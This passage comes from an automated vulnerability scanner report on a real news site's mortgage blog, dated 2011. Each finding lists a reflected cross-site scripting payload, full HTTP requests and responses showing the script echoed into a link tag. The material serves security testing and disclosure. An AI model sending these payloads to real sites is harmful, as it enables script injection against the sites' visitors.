Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011d4cbf\"><script>alert(1)</script>bf63c84bd54/01/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eafb"><script>alert(1)</script>e74c7ede1c7 was submitted in the REST URL parameter 2. This input was echoed as 6eafb\"><script>alert(1)</script>e74c7ede1c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/016eafb"><script>alert(1)</script>e74c7ede1c7/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:03 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/016eafb\"><script>alert(1)</script>e74c7ede1c7/feed/" /> ...[SNIP]...
1.356. http://mortgage.ocregister.com/2011/01/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2011/01/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6821d"><script>alert(1)</script>a9bdec31fc9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6821d\"><script>alert(1)</script>a9bdec31fc9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/?6821d"><script>alert(1)</script>a9bdec31fc9=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 100078
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2011 January - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/?6821d\"><script>alert(1)</script>a9bdec31fc9=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf68d"><script>alert(1)</script>b4fa67ceb86 was submitted in the REST URL parameter 5. This input was echoed as cf68d\"><script>alert(1)</script>b4fa67ceb86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/08/upside-down-but-still-on-a-good-path/41162cf68d"><script>alert(1)</script>b4fa67ceb86/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:10:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:10:02 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62697
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... nk rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/08/upside-down-but-still-on-a-good-path/41162cf68d\"><script>alert(1)</script>b4fa67ceb86/feed/" /> ...[SNIP]...
1.358. http://mortgage.ocregister.com/2011/01/08/upside-down-but-still-on-a-good-path/41162/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a165b"><script>alert(1)</script>757581a972c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a165b\"><script>alert(1)</script>757581a972c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/08/upside-down-but-still-on-a-good-path/41162/?a165b"><script>alert(1)</script>757581a972c=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:09:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41162>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77227
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... "application/rss+xml" title=" Upside down but still on a good path - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/08/upside-down-but-still-on-a-good-path/41162/?a165b\"><script>alert(1)</script>757581a972c=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2896b"><script>alert(1)</script>20b18d9fc89 was submitted in the REST URL parameter 5. This input was echoed as 2896b\"><script>alert(1)</script>20b18d9fc89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/13/late-o-c-mortgage-payments-drop/413342896b"><script>alert(1)</script>20b18d9fc89/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:09:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:09:57 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62694
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/13/late-o-c-mortgage-payments-drop/413342896b\"><script>alert(1)</script>20b18d9fc89/feed/" /> ...[SNIP]...
1.360. http://mortgage.ocregister.com/2011/01/13/late-o-c-mortgage-payments-drop/41334/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30dce"><script>alert(1)</script>046932d1455 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 30dce\"><script>alert(1)</script>046932d1455 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/13/late-o-c-mortgage-payments-drop/41334/?30dce"><script>alert(1)</script>046932d1455=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:09:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41334>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 74370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... te" type="application/rss+xml" title=" Late O.C. mortgage payments drop - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/13/late-o-c-mortgage-payments-drop/41334/?30dce\"><script>alert(1)</script>046932d1455=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18630"><script>alert(1)</script>df0e4fbd4ac was submitted in the REST URL parameter 5. This input was echoed as 18630\"><script>alert(1)</script>df0e4fbd4ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/4134018630"><script>alert(1)</script>df0e4fbd4ac/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:09:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:09:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62710
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... rnate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/4134018630\"><script>alert(1)</script>df0e4fbd4ac/feed/" /> ...[SNIP]...
1.362. http://mortgage.ocregister.com/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87cd4"><script>alert(1)</script>0a7d55204ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 87cd4\"><script>alert(1)</script>0a7d55204ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/?87cd4"><script>alert(1)</script>0a7d55204ed=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:09:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41340>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 80681
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... e=" CA. foreclosure starts fall, but more auctions set - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/?87cd4\"><script>alert(1)</script>0a7d55204ed=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1aa0d"><script>alert(1)</script>b758a53c615 was submitted in the REST URL parameter 5. This input was echoed as 1aa0d\"><script>alert(1)</script>b758a53c615 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/14/newport-home-in-squatters-case-set-for-auction/413841aa0d"><script>alert(1)</script>b758a53c615/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:09:54 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:09:55 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62707
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... ternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/14/newport-home-in-squatters-case-set-for-auction/413841aa0d\"><script>alert(1)</script>b758a53c615/feed/" /> ...[SNIP]...
1.364. http://mortgage.ocregister.com/2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27e8b"><script>alert(1)</script>6320bb6e639 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 27e8b\"><script>alert(1)</script>6320bb6e639 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/?27e8b"><script>alert(1)</script>6320bb6e639=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:09:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41384>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89941
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... port home in ‘squatting’ case set for auction - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/?27e8b\"><script>alert(1)</script>6320bb6e639=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5115"><script>alert(1)</script>56f1b51a9ac was submitted in the REST URL parameter 5. This input was echoed as a5115\"><script>alert(1)</script>56f1b51a9ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318a5115"><script>alert(1)</script>56f1b51a9ac/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:09:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:09:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318a5115\"><script>alert(1)</script>56f1b51a9ac/feed/" /> ...[SNIP]...
1.366. http://mortgage.ocregister.com/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf971"><script>alert(1)</script>7480d29f651 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf971\"><script>alert(1)</script>7480d29f651 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/?bf971"><script>alert(1)</script>7480d29f651=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:09:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41318>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81637
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... 217;t hold your breath for a refund - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/?bf971\"><script>alert(1)</script>7480d29f651=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e83f7"><script>alert(1)</script>7acb025cf16 was submitted in the REST URL parameter 5. This input was echoed as e83f7\"><script>alert(1)</script>7acb025cf16 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/25/foreclosures-down-31-in-state/41514e83f7"><script>alert(1)</script>7acb025cf16/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:09:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:09:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62691
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/25/foreclosures-down-31-in-state/41514e83f7\"><script>alert(1)</script>7acb025cf16/feed/" /> ...[SNIP]...
1.368. http://mortgage.ocregister.com/2011/01/25/foreclosures-down-31-in-state/41514/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2011/01/25/foreclosures-down-31-in-state/41514/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39195"><script>alert(1)</script>7289003fdd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 39195\"><script>alert(1)</script>7289003fdd6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/25/foreclosures-down-31-in-state/41514/?39195"><script>alert(1)</script>7289003fdd6=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:09:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41514>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78706
